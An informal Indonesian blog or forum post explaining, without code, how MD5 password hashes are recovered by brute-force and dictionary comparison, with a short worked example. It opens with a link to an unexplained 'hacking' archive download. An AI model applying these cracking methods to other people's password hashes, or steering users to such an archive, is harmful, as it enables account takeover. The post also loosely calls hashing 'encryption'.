Wassallam wm wb..MERDEKAAAAAAAA!!!


Ingin belajar hacking silakan download ini


http://rapidshare.com/files/75661607/UltimateHacking2007.rar



Bagaimana Cara Cracking md5 ciphered text ??

LOGIKA :
md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.

md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.

contoh :
plaintext : malcoder
ciphertext : 8c6d8aed6dc647db4e98ded91049e998

plaintext : apapunlah
ciphertext : 15cdd0fd997178efc32991ea5a5008ea

plaintext : a
ciphertext : 0cc175b9c0f1b6a831c399e269772661

itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....

caranya :
harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...
nah lalu kenapa bisa dicrack ??
yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...

TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..
"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...

binun ??? hehehe... yaudah saya jelaskan...

misalnya :

md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33

trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:

plaintext | Ciphertext
a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok
b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok
c 4a8a08f09d37b73795649038408b5f33 {== COCOK

setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??
dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"

CRACKED ... tugas selesaiii..

mudah2an bisa dimengerti...